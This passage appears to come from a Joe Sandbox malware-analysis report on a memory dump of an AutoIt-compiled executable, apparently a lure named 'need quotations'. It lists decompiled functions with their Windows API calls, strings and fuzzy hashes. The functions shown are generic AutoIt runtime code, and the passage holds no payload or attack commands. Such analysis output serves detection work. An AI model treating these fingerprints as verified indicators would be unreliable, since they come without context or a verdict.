CLASSNAME=, xrefs: 0027D790
REGEXP=, xrefs: 0027D768
LAST, xrefs: 0027D718

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 63cbce682bd85c86b62547482030e842f9b94442ac58dc86c9eae4ffb2dbbad6
Instruction ID: b48fa44cfe22f1eb6ca439ca905ec131ca29c50e0c37c7bb5464fbe0af699f13
Opcode Fuzzy Hash: 63cbce682bd85c86b62547482030e842f9b94442ac58dc86c9eae4ffb2dbbad6
Instruction Fuzzy Hash: 8B31A131674209E6DB18EE50DE43FBEF3B49F22744F604139F945710E1EBA1AE398A12

Function 0027EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0027EAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0027EAC2
SetWindowTextW.USER32(?,?), ref: 0027EAD9
GetDlgItem.USER32(?,000003EA), ref: 0027EAEE
SetWindowTextW.USER32(00000000,?), ref: 0027EAF4
GetDlgItem.USER32(?,000003E9), ref: 0027EB04
SetWindowTextW.USER32(00000000,?), ref: 0027EB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0027EB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0027EB45
GetWindowRect.USER32(?,?), ref: 0027EB4E
SetWindowTextW.USER32(?,?), ref: 0027EBB9
GetDesktopWindow.USER32 ref: 0027EBBF
GetWindowRect.USER32(00000000), ref: 0027EBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0027EC12
GetClientRect.USER32(?,?), ref: 0027EC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0027EC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0027EC6F

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 23fdfc09f1d8f73b2dc71446f73b23184616936109721f5a4e1d3860f80d3d52
Instruction ID: 217ee819d226ce2cfe7e9559951d49adb7d24bd8f8128ba7a4215ff39f006ad8
Opcode Fuzzy Hash: 23fdfc09f1d8f73b2dc71446f73b23184616936109721f5a4e1d3860f80d3d52
Instruction Fuzzy Hash: A5515071900709AFDB209FA4DD89F6EBBB9FF08708F114568E546A25A0C774A914CF10

Function 002979B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 002979C6
LoadCursorW.USER32(00000000,00007F00), ref: 002979D1
LoadCursorW.USER32(00000000,00007F03), ref: 002979DC
LoadCursorW.USER32(00000000,00007F8B), ref: 002979E7
LoadCursorW.USER32(00000000,00007F01), ref: 002979F2
LoadCursorW.USER32(00000000,00007F81), ref: 002979FD
LoadCursorW.USER32(00000000,00007F88), ref: 00297A08
LoadCursorW.USER32(00000000,00007F80), ref: 00297A13
LoadCursorW.USER32(00000000,00007F86), ref: 00297A1E
LoadCursorW.USER32(00000000,00007F83), ref: 00297A29
LoadCursorW.USER32(00000000,00007F85), ref: 00297A34
LoadCursorW.USER32(00000000,00007F82), ref: 00297A3F
LoadCursorW.USER32(00000000,00007F84), ref: 00297A4A
LoadCursorW.USER32(00000000,00007F04), ref: 00297A55
LoadCursorW.USER32(00000000,00007F02), ref: 00297A60
LoadCursorW.USER32(00000000,00007F89), ref: 00297A6B
GetCursorInfo.USER32(?), ref: 00297A7B

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 095fb49ff3591ca7d9f51a7c5b3f9674e02ffb5f619bd0623b51b9869b3326bd
Instruction ID: bc90eaf66c8af43a02bc7d488e455edee78294eeb15f9c9a53c246cf5c8067e8
Opcode Fuzzy Hash: 095fb49ff3591ca7d9f51a7c5b3f9674e02ffb5f619bd0623b51b9869b3326bd
Instruction Fuzzy Hash: 0C3113B0D1831AAADF109FB68C8995FBFE8FF04750F50452AA50DE7280DA78A5008FA5

Function 0024C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 0025E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0024C8B7,?,00002000,?,?,00000000,?,0024419E,?,?,?,002DDC00), ref: 0025E984

Part of subcall function 0024660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002453B1,?,?,002461FF,?,00000000,00000001,00000000), ref: 0024662F

__wsplitpath.LIBCMT ref: 0024C93E

Part of subcall function 00261DFC: __wsplitpath_helper.LIBCMT ref: 00261E3C

_wcscpy.LIBCMT ref: 0024C953
_wcscat.LIBCMT ref: 0024C968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0024C978
SetCurrentDirectoryW.KERNEL32(?), ref: 0024CABE

Part of subcall function 0024B337: _wcscpy.LIBCMT ref: 0024B36F

Strings

EA06, xrefs: 002B30C9
Error opening the file, xrefs: 002B30B4, 002B313D
Bad directive syntax error, xrefs: 002B3429
AU3!, xrefs: 0024C90C
>>>AUTOIT SCRIPT<<<, xrefs: 002B311B
#include depth exceeded. Make sure there are no recursive includes, xrefs: 002B3098
Unterminated string, xrefs: 002B3470

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: 094c3d189fc546f7e8477761dcfe68215007485f7151f9e4dc198edcdd375719
Instruction ID: eaeb5db871f1c4044663194a82f5597b59b352682ea9b6d3f7a73c75a270343b
Opcode Fuzzy Hash: 094c3d189fc546f7e8477761dcfe68215007485f7151f9e4dc198edcdd375719
Instruction Fuzzy Hash: 0312B1715283419FC728EF28C881AAFBBE4BF89344F54491EF58993251DB30DA69CF52

Function 002ACE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002ACEFB
DestroyWindow.USER32(?,?), ref: 002ACF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 002ACFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002AD016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002AD025
DestroyWindow.USER32(?), ref: 002AD042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00240000,00000000), ref: 002AD075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002AD094
GetDesktopWindow.USER32 ref: 002AD0A9
GetWindowRect.USER32(00000000), ref: 002AD0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002AD0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002AD0DA

Part of subcall function 0025B526: GetWindowLongW.USER32(?,000000EB), ref: 0025B537

Strings

0, xrefs: 002ACF1B
tooltips_class32, xrefs: 002ACFED, 002AD06E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: 68e59f0173739e2ba598b6a113f6abaf7c2efc0005616c7954e6300fbac7cacb
Instruction ID: ba12d698cf7dbdfbf13458bfed4e654810e89bdcf26a1c8a478288ab09563038
Opcode Fuzzy Hash: 68e59f0173739e2ba598b6a113f6abaf7c2efc0005616c7954e6300fbac7cacb
Instruction Fuzzy Hash: FA71FEB0160306AFD725CF28DC84F6677E9EB8A704F14451EF986872A1DB75E852CF22

Function 002AF351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

DragQueryPoint.SHELL32(?,?), ref: 002AF37A

Part of subcall function 002AD7DE: ClientToScreen.USER32(?,?), ref: 002AD807
Part of subcall function 002AD7DE: GetWindowRect.USER32(?,?), ref: 002AD87D
Part of subcall function 002AD7DE: PtInRect.USER32(?,?,002AED5A), ref: 002AD88D

SendMessageW.USER32(?,000000B0,?,?), ref: 002AF3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002AF3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002AF411
_wcscat.LIBCMT ref: 002AF441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 002AF458
SendMessageW.USER32(?,000000B0,?,?), ref: 002AF471
SendMessageW.USER32(?,000000B1,?,?), ref: 002AF488
SendMessageW.USER32(?,000000B1,?,?), ref: 002AF4AA
DragFinish.SHELL32(?), ref: 002AF4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 002AF59C

Strings

@GUI_DRAGID, xrefs: 002AF510
@GUI_DROPID, xrefs: 002AF4D1
@GUI_DRAGFILE, xrefs: 002AF54B

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 0ea4fa992019aa82f076bd9d78e86c70b2690d1ac0a976de5aff86cbb00a3218
Instruction ID: 7c40eaf0348c26395cff9825e0e3454f274e2835873e6e800213d492e3126087
Opcode Fuzzy Hash: 0ea4fa992019aa82f076bd9d78e86c70b2690d1ac0a976de5aff86cbb00a3218
Instruction Fuzzy Hash: 07615A71118304AFC315EF64DC89DABBBF8EF89750F100A2EF695921A1DB709A19CB52

Function 0028AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0028AB3D
VariantCopy.OLEAUT32(?,?), ref: 0028AB46
VariantClear.OLEAUT32(?), ref: 0028AB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0028AC40
__swprintf.LIBCMT ref: 0028AC70
VarR8FromDec.OLEAUT32(?,?), ref: 0028AC9C
VariantInit.OLEAUT32(?), ref: 0028AD4D
SysFreeString.OLEAUT32(00000016), ref: 0028ADDF
VariantClear.OLEAUT32(?), ref: 0028AE35
VariantClear.OLEAUT32(?), ref: 0028AE44
VariantInit.OLEAUT32(00000000), ref: 0028AE80

Strings

Default, xrefs: 0028ACFD
%4d%02d%02d%02d%02d%02d, xrefs: 0028AC6A

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: bf8c8a9b24a954f65bd48a58aad1af56e0dc05a12581428165d9c803d123028e
Instruction ID: 9090985b17ae3f678fe5ac8a8f383f7de48a20033c76e83be83c2c9419f652bb
Opcode Fuzzy Hash: bf8c8a9b24a954f65bd48a58aad1af56e0dc05a12581428165d9c803d123028e
Instruction Fuzzy Hash: 48D1F139622106DBEB24AF69D885B6AB7B5FF04700F248467E5059B1C1DFB0EC70DB92

Function 002A716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002A71FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002A7247

Strings

SELECT, xrefs: 002A73E0
GETITEMCOUNT, xrefs: 002A7311
UNCHECK, xrefs: 002A740B
ISCHECKED, xrefs: 002A73B2
EXPAND, xrefs: 002A72E1
EXISTS, xrefs: 002A72B0
GETTEXT, xrefs: 002A7382
COLLAPSE, xrefs: 002A728D
GETTOTALCOUNT, xrefs: 002A722A
GETSELECTED, xrefs: 002A733F
CHECK, xrefs: 002A7267

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 5d6c6bc9f98c2bea749f9c014062d57ae040c6ec8905cf58f5ba22492ff340ed
Instruction ID: 18fada511c5f22cf267b27274d31fde6ff7c2cecb8e00d856d61762b25a26400
Opcode Fuzzy Hash: 5d6c6bc9f98c2bea749f9c014062d57ae040c6ec8905cf58f5ba22492ff340ed
Instruction Fuzzy Hash: B29173302246018BCB08EF20C851A6EB7A5AF55750F1148ADFD96573A3DF70ED6ACF85

Function 0027CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0027CF50), ref: 0027CE90

Strings

4+/, xrefs: 0027CC96
REGEXPCLASS, xrefs: 0027CC56
CLASS, xrefs: 0027CC10
T+/, xrefs: 0027CD72
INSTANCE, xrefs: 0027CD9E
H+/, xrefs: 0027CCE8
NAME, xrefs: 0027CCC2
CLASSNN, xrefs: 0027CC33
TEXT, xrefs: 0027CDC7
L+/, xrefs: 0027CD14
P+/, xrefs: 0027CD43

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ChildEnumWindows
String ID: 4+/$CLASS$CLASSNN$H+/$INSTANCE$L+/$NAME$P+/$REGEXPCLASS$T+/$TEXT
API String ID: 3555792229-2774345106
Opcode ID: 3ace006af95289972b335e7b50be4b2da43d6eda8240318634e9b8cb138dce19
Instruction ID: 53bef8b56cb280993687072e2cabd04adf064dc8830d7da1cd71143df742059e
Opcode Fuzzy Hash: 3ace006af95289972b335e7b50be4b2da43d6eda8240318634e9b8cb138dce19
Instruction Fuzzy Hash: 92915D30620506ABCB18DF70C481BEAFB75BF05344F64852AE95DA7151DF70A9B9CB90

Function 002AE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002AE5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,002A9808,?), ref: 002AE607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002AE647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002AE68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002AE6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,002A9808,?), ref: 002AE6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002AE6DF
DestroyIcon.USER32(?), ref: 002AE6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 002AE70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 002AE717

Part of subcall function 00260FA7: __wcsicmp_l.LIBCMT ref: 00261030

Strings

.dll, xrefs: 002AE564
.icl, xrefs: 002AE521
.exe, xrefs: 002AE541

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 6c0d627abf475d7abc84304aa7a11bef4731793e3f82668765e29f9479d97433
Instruction ID: 55be4748ae80d813e110bb40f3f7d53b6f64d6395bb836623e6e3cd2cbb23408
Opcode Fuzzy Hash: 6c0d627abf475d7abc84304aa7a11bef4731793e3f82668765e29f9479d97433
Instruction Fuzzy Hash: 7C61FE71920219BBEF24DF24DC86FBE7BACAB19B14F104515F911D60D1EBB099A1CBA0

Function 0028D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

CharLowerBuffW.USER32(?,?), ref: 0028D292
GetDriveTypeW.KERNEL32 ref: 0028D2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0028D327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0028D35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0028D38C

Strings

closed, xrefs: 0028D2A6, 0028D2AF
type cdaudio alias cd wait, xrefs: 0028D30A
wait, xrefs: 0028D349
close, xrefs: 0028D298
close cd wait, xrefs: 0028D377
open, xrefs: 0028D2B9
open , xrefs: 0028D2EE
set cd door , xrefs: 0028D32D

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 5f53a954b27e839caba4f28fcc113be41150fcd51315f162f34766a701ab86be
Instruction ID: b5466e1ad4086b84b7c794a4391f7a87574885cc47177448f4303f570c963c5a
Opcode Fuzzy Hash: 5f53a954b27e839caba4f28fcc113be41150fcd51315f162f34766a701ab86be
Instruction Fuzzy Hash: 40513B751246059FC704EF10C88196EB7E4EF99758F10486DF88A672A2DB31EE2ACF42

Function 002826BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,002B3973,00000016,0000138C,00000016,?,00000016,002DDDB4,00000000,?), ref: 002826F1
LoadStringW.USER32(00000000,?,002B3973,00000016), ref: 002826FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,002B3973,00000016,0000138C,00000016,?,00000016,002DDDB4,00000000,?,00000016), ref: 0028271C
LoadStringW.USER32(00000000,?,002B3973,00000016), ref: 0028271F
__swprintf.LIBCMT ref: 0028276F
__swprintf.LIBCMT ref: 00282780
_wprintf.LIBCMT ref: 00282829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00282840

Strings

Line %d (File "%s"):, xrefs: 00282769
Line %d:, xrefs: 0028277A
Error: , xrefs: 002827F7
^ ERROR, xrefs: 002827D5
%s (%d) : ==> %s: %s %s, xrefs: 00282824

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: d9ced7e59c92056d19be0e9ab788160d20135aa287744718acea1e0c86bad363
Instruction ID: c2ff03c0a140e0bf6a5fa9f3e33734675e64e939cad8608736492f071a34548b
Opcode Fuzzy Hash: d9ced7e59c92056d19be0e9ab788160d20135aa287744718acea1e0c86bad363
Instruction Fuzzy Hash: 0D412C72811219BACF19FBE4DD86EEEB778AF15344F100065B60572092EA746F69CF60

Function 0028D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0028D0D8
__swprintf.LIBCMT ref: 0028D0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 0028D137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0028D15C
_memset.LIBCMT ref: 0028D17B
_wcsncpy.LIBCMT ref: 0028D1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0028D1EC
CloseHandle.KERNEL32(00000000), ref: 0028D1F7
RemoveDirectoryW.KERNEL32(?), ref: 0028D200
CloseHandle.KERNEL32(00000000), ref: 0028D20A

Strings

\??\%s, xrefs: 0028D0F4
\, xrefs: 0028D110
:, xrefs: 0028D11B

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 75191a778eada0618e7678d12913f24796fb40824f28668b35fcf4dc2f64a9f0
Instruction ID: 5f4bf76065d94cf5c6e85ac5c5250e5c95636014a454a3f98fb58fd8196b49fa
Opcode Fuzzy Hash: 75191a778eada0618e7678d12913f24796fb40824f28668b35fcf4dc2f64a9f0
Instruction Fuzzy Hash: 7E31C37651010AABDB21EFA0DC48FEB77BCEF88740F1040B6F909D21A5E770A6548B24

Function 002787CD Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 0027882D
